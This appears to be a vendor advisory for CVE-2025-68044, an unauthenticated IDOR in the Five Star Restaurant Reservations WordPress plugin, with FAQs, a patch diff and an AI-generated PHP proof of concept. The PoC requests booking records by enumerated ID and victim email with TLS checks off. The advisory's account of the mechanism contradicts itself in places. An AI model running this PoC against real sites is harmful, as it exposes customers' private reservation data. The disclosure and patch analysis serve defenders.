What is CVE-2025-68044?

CVE-2025-68044 is a medium severity vulnerability in the Five Star Restaurant Reservations WordPress plugin, specifically versions up to 2.7.4. It is classified as an unauthenticated Insecure Direct Object Reference (IDOR), allowing attackers to perform unauthorized actions on booking records.

How does this vulnerability work?

The vulnerability allows attackers to manipulate the booking ID parameter in requests to access booking records without proper authorization. By providing a valid email associated with a booking, an attacker can bypass checks and perform actions such as viewing or modifying bookings.

Who is affected by this vulnerability?

Any WordPress site using the Five Star Restaurant Reservations plugin version 2.7.4 or earlier is affected. Administrators should check their plugin version in the WordPress dashboard to determine if they need to take action.

How can I check if my site is vulnerable?

To check if your site is vulnerable, navigate to the Plugins section in your WordPress admin panel. Look for the Five Star Restaurant Reservations plugin and verify if the version is 2.7.4 or earlier.

How can I fix this vulnerability?

The vulnerability is patched in version 2.7.5 of the plugin. Administrators should update to this version or later to mitigate the risk associated with CVE-2025-68044.

What does the CVSS score of 5.3 indicate?

A CVSS score of 5.3 indicates a medium severity vulnerability. This means that while the vulnerability is not critical, it poses a significant risk that could lead to unauthorized access and data exposure if exploited.

What are the practical risks of this vulnerability?

Exploitation of this vulnerability could allow unauthorized users to access sensitive customer information, modify or cancel reservations, and disrupt business operations. This could lead to data privacy violations and loss of customer trust.

What is the proof of concept for this vulnerability?

The proof of concept demonstrates how an attacker can construct a request to the vulnerable endpoint using a manipulated booking ID and email address. It illustrates the ease with which unauthorized actions can be performed on booking records.

What changes were made in the patched version?

In the patched version 2.7.5, an additional authorization check was added to ensure that requests originate from a legitimate booking insertion flow. This prevents unauthorized access to booking records by validating the request context.

How can I further secure my WordPress site?

In addition to updating plugins regularly, consider implementing security measures such as using a web application firewall, monitoring for suspicious activity, and educating users about secure practices to minimize vulnerabilities.

Is there a way to automate plugin updates?

Yes, WordPress allows administrators to enable automatic updates for plugins. This can be configured in the WordPress dashboard under the Plugins section or by using code in the site’s wp-config.php file.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the plugin until it can be updated or implementing access controls to limit exposure. Monitor for any suspicious activity related to the plugin during this time.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-68044: Five Star Restaurant Reservations <= 2.7.4 – Unauthenticated Insecure Direct Object Reference (restaurant-reservations)

CVE ID CVE-2025-68044

Plugin restaurant-reservations

Severity Medium (CVSS 5.3)

CWE 639

Vulnerable Version 2.7.4

Patched Version 2.7.5

Disclosed January 1, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-68044:
This vulnerability is an unauthenticated Insecure Direct Object Reference (IDOR) in the Five Star Restaurant Reservations WordPress plugin. The flaw allows attackers to bypass authorization checks and perform unauthorized actions on booking records. The CVSS score of 5.3 indicates a medium severity impact.

The root cause lies in the template-functions.php file, specifically within the function that handles booking confirmation or management. The vulnerable code at line 162 only validates that a user-supplied email matches the email associated with a booking ID. This check occurs without verifying whether the request itself is authorized or originates from a legitimate booking insertion flow. The $booking_id parameter is user-controlled and directly loads a booking object without prior authorization validation.

Exploitation involves sending a request to the plugin’s booking confirmation or management endpoint with a manipulated booking_id parameter. Attackers can enumerate or guess valid booking IDs, then submit requests containing those IDs along with any email address. The system will load the booking object and proceed with actions if the attacker provides the correct associated email, which could be obtained through other means or brute-forced. The exact endpoint varies but typically involves front-end booking management pages or AJAX handlers exposed by the plugin.

The patch adds an additional authorization check before the email comparison. The condition now includes `$rtb_controller->request->request_inserted !== true` alongside the existing email check. This ensures the request originates from a legitimate booking insertion flow controlled by the plugin’s internal request object. The fix prevents direct object reference by unauthorized requests that haven’t gone through the proper booking creation workflow.

Successful exploitation allows unauthenticated attackers to access, modify, or delete booking records. Attackers could view sensitive customer information including names, email addresses, phone numbers, reservation details, and special requests. They could also potentially cancel reservations or modify booking details, causing business disruption, data privacy violations, and loss of customer trust.

Differential between vulnerable and patched code

Code Diff

--- a/restaurant-reservations/includes/template-functions.php
+++ b/restaurant-reservations/includes/template-functions.php
@@ -162,7 +162,7 @@
 		$booking = new rtbBooking();
 		$booking->load_post( $booking_id );

-		if ( $booking_email != $booking->email ) { ?>
+		if ( $rtb_controller->request->request_inserted !== true and $booking_email != $booking->email ) { ?>
 			<div class="rtb-message">
 				<p><?php echo esc_html__( 'Reservation email does not match the email associated with this booking.', 'restaurant-reservations' ); ?></p>
 			</div>
--- a/restaurant-reservations/restaurant-reservations.php
+++ b/restaurant-reservations/restaurant-reservations.php
@@ -3,7 +3,7 @@
  * Plugin Name: Five Star Restaurant Reservations - WordPress Booking Plugin
  * Plugin URI: http://www.fivestarplugins.com/plugins/five-star-restaurant-reservations/
  * Description: Restaurant reservations made easy. Accept bookings online. Quickly confirm or reject reservations, send email notifications, set booking times and more.
- * Version: 2.7.4
+ * Version: 2.7.5
  * Author: Five Star Plugins
  * Author URI: https://www.fivestarplugins.com/
  * Text Domain: restaurant-reservations
@@ -58,7 +58,7 @@
 	public function __construct() {

 		// Common strings
-		define( 'RTB_VERSION', '2.7.4' );
+		define( 'RTB_VERSION', '2.7.5' );
 		define( 'RTB_PLUGIN_DIR', untrailingslashit( plugin_dir_path( __FILE__ ) ) );
 		define( 'RTB_PLUGIN_URL', untrailingslashit( plugins_url( basename( plugin_dir_path( __FILE__ ) ), basename( __FILE__ ) ) ) );
 		define( 'RTB_PLUGIN_FNAME', plugin_basename( __FILE__ ) );

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-68044 - Five Star Restaurant Reservations <= 2.7.4 - Unauthenticated Insecure Direct Object Reference

<?php
/**
 * Proof of Concept for CVE-2025-68044
 * Targets the booking confirmation/management functionality
 * Requires a valid booking ID and associated email (obtained via enumeration)
 */

$target_url = 'https://vulnerable-site.com/'; // CHANGE THIS
$booking_id = 123; // Target booking ID (enumerate via sequential IDs)
$booking_email = 'victim@example.com'; // Email associated with the booking

// Construct the endpoint - typically a booking confirmation page
// The exact URL pattern depends on plugin configuration
$endpoint = $target_url . '?booking_id=' . urlencode($booking_id) . '&booking_email=' . urlencode($booking_email);

// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $endpoint);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

// Execute request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Analyze response
if ($http_code == 200) {
    // Check if booking details are exposed in the response
    if (strpos($response, 'booking-details') !== false || 
        strpos($response, 'reservation-confirmation') !== false ||
        strpos($response, 'rtb-booking') !== false) {
        echo "[+] VULNERABLE: Booking details accessiblen";
        echo "[+] HTTP Code: $http_coden";
        // Extract and display sensitive information
        preg_match('/<div class="booking-details">(.*?)</div>/s', $response, $matches);
        if (!empty($matches[1])) {
            echo "[+] Extracted booking details:n";
            echo htmlspecialchars($matches[1]) . "n";
        }
    } else {
        echo "[-] Plugin response does not contain booking detailsn";
        echo "[-] HTTP Code: $http_coden";
    }
} else {
    echo "[-] Request failed with HTTP code: $http_coden";
}

// Note: This PoC assumes the endpoint structure. Actual exploitation may require
// targeting specific plugin pages like booking confirmation, management, or AJAX handlers.
?>

Frequently Asked Questions

What is CVE-2025-68044?
Overview of the vulnerability
CVE-2025-68044 is a medium severity vulnerability in the Five Star Restaurant Reservations WordPress plugin, specifically versions up to 2.7.4. It is classified as an unauthenticated Insecure Direct Object Reference (IDOR), allowing attackers to perform unauthorized actions on booking records.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability allows attackers to manipulate the booking ID parameter in requests to access booking records without proper authorization. By providing a valid email associated with a booking, an attacker can bypass checks and perform actions such as viewing or modifying bookings.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Five Star Restaurant Reservations plugin version 2.7.4 or earlier is affected. Administrators should check their plugin version in the WordPress dashboard to determine if they need to take action.
How can I check if my site is vulnerable?
Verifying plugin versions
To check if your site is vulnerable, navigate to the Plugins section in your WordPress admin panel. Look for the Five Star Restaurant Reservations plugin and verify if the version is 2.7.4 or earlier.
How can I fix this vulnerability?
Updating the plugin
The vulnerability is patched in version 2.7.5 of the plugin. Administrators should update to this version or later to mitigate the risk associated with CVE-2025-68044.
What does the CVSS score of 5.3 indicate?
Understanding severity levels
A CVSS score of 5.3 indicates a medium severity vulnerability. This means that while the vulnerability is not critical, it poses a significant risk that could lead to unauthorized access and data exposure if exploited.
What are the practical risks of this vulnerability?
Potential impacts on businesses
Exploitation of this vulnerability could allow unauthorized users to access sensitive customer information, modify or cancel reservations, and disrupt business operations. This could lead to data privacy violations and loss of customer trust.
What is the proof of concept for this vulnerability?
Demonstrating the exploit
The proof of concept demonstrates how an attacker can construct a request to the vulnerable endpoint using a manipulated booking ID and email address. It illustrates the ease with which unauthorized actions can be performed on booking records.
What changes were made in the patched version?
Details of the security fix
In the patched version 2.7.5, an additional authorization check was added to ensure that requests originate from a legitimate booking insertion flow. This prevents unauthorized access to booking records by validating the request context.
How can I further secure my WordPress site?
Best practices for WordPress security
In addition to updating plugins regularly, consider implementing security measures such as using a web application firewall, monitoring for suspicious activity, and educating users about secure practices to minimize vulnerabilities.
Is there a way to automate plugin updates?
Managing updates efficiently
Yes, WordPress allows administrators to enable automatic updates for plugins. This can be configured in the WordPress dashboard under the Plugins section or by using code in the site’s wp-config.php file.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If immediate updates are not possible, consider disabling the plugin until it can be updated or implementing access controls to limit exposure. Monitor for any suspicious activity related to the plugin during this time.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations